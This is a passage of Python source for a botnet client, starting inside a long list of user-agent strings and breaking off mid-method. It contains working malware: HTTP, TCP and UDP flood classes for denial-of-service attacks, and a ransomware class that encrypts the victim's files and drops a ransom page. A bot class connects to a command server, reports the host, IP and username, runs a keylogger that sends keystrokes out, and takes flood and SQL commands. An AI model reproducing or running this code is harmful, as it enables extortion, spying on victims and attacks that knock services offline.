Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51', 'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)', 'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)', 'Links (2.1pre15; FreeBSD 5.4-STABLE i386; 158x58)', 'Wget/1.8.2', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0', 'Mediapartners-Google/2.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7', 'Mozilla/4.04 [en] (WinNT; I)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)', 'lwp-trivial/1.41', 'NetBSD-ftp/20031210', 'Dillo/0.8.5-i18n-misc', 'Links (2.1pre20; NetBSD 2.1_STABLE i386; 145x54)', 'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Lynx/2.8.5rel.3 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Links (2.1pre19; NetBSD 2.1_STABLE sparc64; 145x54)', 'Lynx/2.8.6dev.15 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Links (2.1pre14; IRIX64 6.5 IP27; 145x54)', 'Wget/1.10.1', 'ELinks/0.10.5 (textmode; FreeBSD 4.11-STABLE i386; 80x22-2)', 'Links (2.1pre20; FreeBSD 4.11-STABLE i386; 80x22)', 'Lynx/2.8.5rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d-p1', 'Opera/8.52 (X11; Linux i386; U; de)', 'Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.1) Gecko/20060310 Firefox/1.5.0.1', 'Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711', 'Mozilla/4.8 [en] (X11; U; IRIX64 6.5 IP27)', 'Mozilla/4.76 [en] (X11; U; SunOS 5.8 sun4m)', 'Opera/5.0 (SunOS 5.8 sun4m; U) [en]', 'Links (2.1pre15; SunOS 5.8 sun4m; 80x24)', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Wget/1.8.1', 'Wget/1.9.1', 'tnftp/20050625', 'Links (1.00pre12; Linux 2.6.14.2.20051115 i686; 80x24) (Debian pkg 0.99+1.00pre12-1)', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.0.16', 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20051122', 'Wget/1.7', 'Lynx/2.8.2rel.1 libwww-FM/2.14', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; de) Opera 8.53', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7e', 'Links (2.1pre20; SunOS 5.10 sun4u; 80x22)', 'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7i', 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8) Gecko/20060202 Firefox/1.5', 'Opera/8.51 (X11; Linux i386; U; de)', 'Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i386--freebsd; X11)', 'Links (0.96; OpenBSD 3.0 sparc)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c', 'Lynx/2.8.3rel.1 libwww-FM/2.14', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)', 'libwww-perl/5.79', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)', 'msnbot/1.0 (+http://search.msn.com/msnbot.htm)', 'Googlebot/2.1 (+http://www.google.com/bot.html)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7', 'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51', 'Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7c', 'Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', 'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)', 'Mozilla/4.8 [en] (Windows NT 5.1; U)', 'Opera/8.51 (Windows NT 5.1; U; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Opera/8.51 (Windows NT 5.1; U; en;VWP-online.de)', 'sproose/0.1-alpha (sproose crawler; http://www.sproose.com/bot.html; crawler@sproose.com)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0,gzip(gfe) (via translate.google.com)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1', 'BrowserEmulator/0.9 see http://dejavu.org', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624', 'iCCrawler (http://www.iccenter.net/bot.htm)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)', 'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8) Gecko/20051111 Firefox/1.5', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.50', 'Mozilla/3.0 (x86 [de] Windows NT 5.0; Sun)', 'Java/1.4.1_04', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5', 'msnbot/0.9 (+http://search.msn.com/msnbot.htm)', 'NutchCVS/0.8-dev (Nutch running at UW; http://www.nutch.org/docs/en/bot.html; sycrawl@cs.washington.edu)', 'Mozilla/4.0 compatible ZyBorg/1.0 (wn-14.zyborg@looksmart.net; http://www.WISEnutbot.com)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.53', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.4) Gecko/20030619 Netscape/7.1 (ax)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)', 'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)', 'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)', 'Mozilla/4.0 (compatible; MSIE 5.5; AOL 7.0; Windows 98)', 'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)', 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)', 'Opera/8.53 (Windows NT 5.1; U; en)', 'Opera/8.01 (Windows NT 5.0; U; de)', 'Opera/8.54 (Windows NT 5.1; U; de)', 'Opera/8.53 (Windows NT 5.0; U; en)', 'Opera/8.01 (Windows NT 5.1; U; de)', 'Opera/8.50 (Windows NT 5.1; U; de)', 'Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322', 'Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)', 'Mozilla/4.0 (compatible; Cerberian Drtrs Version-3.2-Build-0)', 'Mozilla/4.0 (compatible; AvantGo 6.0; FreeBSD)', 'Mozilla/4.5 [de] (Macintosh; I; PPC)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {59FC8AE0-2D88-C929-DA8D-B559D01826E7}; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S04741035500914#914|isdn; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EnergyPlugIn; dial)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; .NET CLR 1.0.3705)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; .NET CLR 1.0.3705)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; yplus 4.1.00b)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0)', 'Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; FunWebProducts)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; BUILDWARE 1.6; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; HbTools 4.7.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; (R1 1.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; it)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; FunWebProducts; HbTools 4.7.5)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; en)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; SV1; FDM)', 'Mozilla/5.0 (Macintosh; U; PPC; de-DE; rv:1.0.2)', 'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)', 'Mozilla/5.0 (compatible; Konqueror/3.4; Linux 2.6.14-kanotix-9; X11)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)', 'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)', 'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)', 'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)', 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)', 'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)', 'Mozilla/5.0 (compatible; Konqueror/3; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)', 'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)', 'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)', 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)', 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)', 'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51'] return user_agents def stop_atk(self): self.stopatk = True def build_querystr(self, value): result = '' for i in range(value): item = random.randint(65, 100) result += chr(item) return result def ddos(self): code = 0 if not self.stopatk: try: agent = random.choice(self.useragents) req = urllib.request.Request(self.ip, headers={'User-Agent': agent, 'Referer': random.choice( self.referers) + self.build_querystr( random.randint(50, 100)), 'Cache-Control': 'no-cache', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive': random.randint(110, 160), 'Connection': 'keep-alive'}) urllib.request.urlopen(req) code = 200 except urllib.error.HTTPError as e: code_split = str(e).split() code = code_split[2] code = str(code[0] + code[1] + code[2]) if "500" in str(e): code = 500 elif "429" in str(e): code = 500 elif code.startswith('5'): code = 500 except urllib.error.URLError as e: if "A connection attempt failed" in str(e): code = 500 except: pass return code def start_thr(self): while True: try: x = threading.Thread(target=self.ddos) x.start() time.sleep(self.delay) if self.stopatk: break except: pass def ddos_start(self): while True: try: http_code = self.ddos() if http_code == 500: break if self.stopatk: break except: pass class TCP_UDP_Flood: def __init__(self, ip, port, delay, pkt_size): self.ip = ip self.port = int(port) self.delay = float(delay) self.pkt_size = int(pkt_size) self.stop = False def gen_packet(self, size): return random._urandom(size) def UDP_Req(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port)) s.close() except: pass def TCP_req(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((self.ip, self.port)) s.send(self.gen_packet(self.pkt_size)) s.close() except: pass def Stop_Atk(self): self.stop = True def TCP_Flood(self): while True: try: tcp_req = threading.Thread(target=self.TCP_req) tcp_req.start() if self.stop: break time.sleep(self.delay) except: pass def UDP_Flood(self): while True: try: udp_req = threading.Thread(target=self.UDP_Req) udp_req.start() if self.stop: break time.sleep(self.delay) except: pass class RansomWare: def __init__(self, key): self.key = key self.fernet = Fernet(self.key) self.dirlist = [] self.filelist = [] self.keyfile = "key.txt" self.recovery_directory = "" if sys.platform == "win32": os.chdir("C:/Users/") self.recovery_directory = f"C:/Users/{os.getlogin()}/" else: self.recovery_directory = "/" os.chdir("/") def get_dir_list(self): for i in os.listdir(): try: file = open(i, "rb") file.close() self.filelist.append(os.path.join(os.getcwd(),i)) except: self.dirlist.append(os.path.join(os.getcwd(), i)) def encrypt_file(self, file): try: with open(file, "rb") as og_file: content = self.fernet.encrypt(og_file.read()) og_file.close() with open(file, "wb") as enc_file: enc_file.write(content) enc_file.close() except: pass def encrypt(self): self.get_dir_list() for i in self.dirlist: try: os.chdir(i) self.get_dir_list() except: pass for i in self.filelist: file_thread = threading.Thread(target=self.encrypt_file, args=(i,)) file_thread.start() self.ransom() self.checker = threading.Thread(target=self.check_key_file) self.checker.start() def decrypt(self): for i in self.filelist: try: with open(i,"rb") as enc_file: content = self.fernet.decrypt(enc_file.read()) enc_file.close() with open(i,"wb") as new_file: new_file.write(content) new_file.close() except: pass def download_emotional_support(self): cmd = subprocess.Popen(f"cd {self.recovery_directory}", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) _cmd = subprocess.Popen(f"curl -o barbara.png https://i.redd.it/w2eduogz9ir51.png", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) def recovering_html_code(self): return f''' <!DOCTYPE html> <head></head> <title>You're in Luck | Your files are being decrypted!</title> <body bgcolor='red'> <h1>Lucky you!</h1> <h2>You have successfully put the correct encryption key into the text file({self.keyfile}).</h2> <h2>Please wait a moment, as the decrypted files are being decrypted at this moment. <h4>You can say your goodbyes to Barbara!</h4> <img src="barbara.png" alt="Where is the image?" width="300" height="500"> </body> ''' def ransom_html_code(self): return f''' <!DOCTYPE html> <head></head> <body bgcolor='red'> <title>Oops! | You've been Compromised!</title> <h1>Oops!</h1> <h2>Looks like your files have been encrypted.</h2> <h3>There is hope.</h3><br> A file has been created in this directory: {self.recovery_directory}{self.keyfile}<br> Simply place the encryption key of your files in the file(and this file only), and you will have your files back!<br> How you will get your key? Well, that's all up to the BotMaster. <h2>Heres a picture of Barbara! Perhaps she will give you emotional Support....</h2><br> <img src="barbara.png" alt="Where is the image?" width="300" height="500"> </body> ''' def check_key_file(self): while True: try: file = open(f"{self.recovery_directory}{self.keyfile}","rb") content = file.read() if bytes(content.strip()) == self.key: self.decryptor = threading.Thread(target=self.decrypt) self.decryptor.start() self.ransom(True) break time.sleep(1) except: pass def ransom(self, recovering=False): os.chdir(self.recovery_directory) if not recovering: keyfile = open(self.keyfile,"w") keyfile.close() self.download_emotional_support() filename = "Oops.html" else: filename = "Yay.html" bot.make_selffiles_encrypted_false() file = open(f"{self.recovery_directory}{filename}","w") if recovering: file.write(self.recovering_html_code()) else: file.write(self.ransom_html_code()) file.close() if sys.platform == "win32": os.startfile(file.name) else: os.system(f"open {file.name}") class Bot: def __init__(self, ip, port, enc_key): self.ip = ip self.port = port self.sendingfile = False self.enc_key = enc_key self.can_encrypt = False self.files_encrypted = False self.sql_connected = False self.keylogging = False self.keylogthreadstarted = False try: self.fernet = Fernet(self.enc_key) self.can_encrypt = True except: pass self.writefile = None self.writing_mode = False def get_ip(self): try: return urllib.request.urlopen(urllib.request.Request(url="https://httpbin.org/ip")).read().decode().strip().split('"')[3] except: try: return socket.gethostbyname(socket.gethostname()) except: return "127.0.0.1" def get_info(self): return f"!botreg {socket.gethostname()} {self.get_ip()} {os.getlogin()} {sys.platform}".encode() def connect(self): while True: try: self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.client.connect((self.ip, self.port)) banner = self.client.recv(1024).decode() time.sleep(5) break except: self.client.close() try: self.client.send(self.get_info()) except: pass reciever = threading.Thread(target=self.recv).start() self.pkt_sender = threading.Thread(target=self.check_still_connected).start() def initiate_connection(self): connect = threading.Thread(target=self.connect).start() def get_filename(self, msg): msg = msg.split() del msg[0] filename = "" for i in msg: filename += f" {i}" return filename.strip() def make_selffiles_encrypted_false(self): self.files_encrypted = False def check_still_connected(self): while True: try: self.client.send("".encode()) time.sleep(10) except: while True: try: reconnect = threading.Thread(target=self.connect).start() break except RuntimeError: pass break def recv(self): while True: try: msg = self.client.recv(10240).decode() if not self.sendingfile: while True: try: handle_msg = threading.Thread(target=self.send, args=(msg,)).start() break except RuntimeError: pass except Exception as e: self.client.close() while True: try: reconnect = threading.Thread(target=self.connect).start() break except RuntimeError: pass break def exec_sql_cmd(self, sqlfile, cmd): sql = sqlite3.connect(sqlfile) cursor = sql.cursor() cursor.execute(cmd) output = str(cursor.fetchall()) sql.commit() cursor.close() sql.close() return output def on_press(self, key): if self.keylogging: self.client.send(f"!key {key}".encode()) def on_release(self, key): pass def start_keylog(self): try: with Listener(on_press=self.on_press, on_release=self.on_release) as L: L.join() except: pass def return_actual_dir(self, direc): return direc.replace("%user%",os.getlogin()) def send(self, msg): msg = str(msg) if not self.writing_mode and not self.sql_connected: try: if msg.startswith("!open"): filename = self.get_filename(msg) if sys.platform == "win32": os.startfile(filename) else: os.system(f"open {filename}") elif msg.startswith("!keylog"): if not self.keylogging: if not self.keylogthreadstarted: keylogger = threading.Thread(target=self.start_keylog) keylogger.start() self.keylogging = True self.keylogthreadstarted = True elif msg.startswith("!stopkeylog"): self.keylogging = False elif msg.startswith('!httpflood'): msg = msg.split() ip = msg[1] delay = float(msg[2]) self.dos = DDoS(ip, delay) elif msg.startswith("!sqlconnect"): try: self.sql_connected = True self.sql_file = self.get_filename(msg) file = open(self.sql_file,"rb") file.close() item = self.exec_sql_cmd(self.sql_file, "select sql from sqlite_master") self.client.send(f"Successfully connected to the Database file: {self.sql_file}".encode()) except Exception as e: self.client.send(f"There was an error connecting to file '{self.sql_file}': {e}".encode()) self.sql_connected = False elif msg.startswith("!stopatk"): try: self.dos.stop_atk() except: pass try: self.tcpflood.Stop_Atk() except: 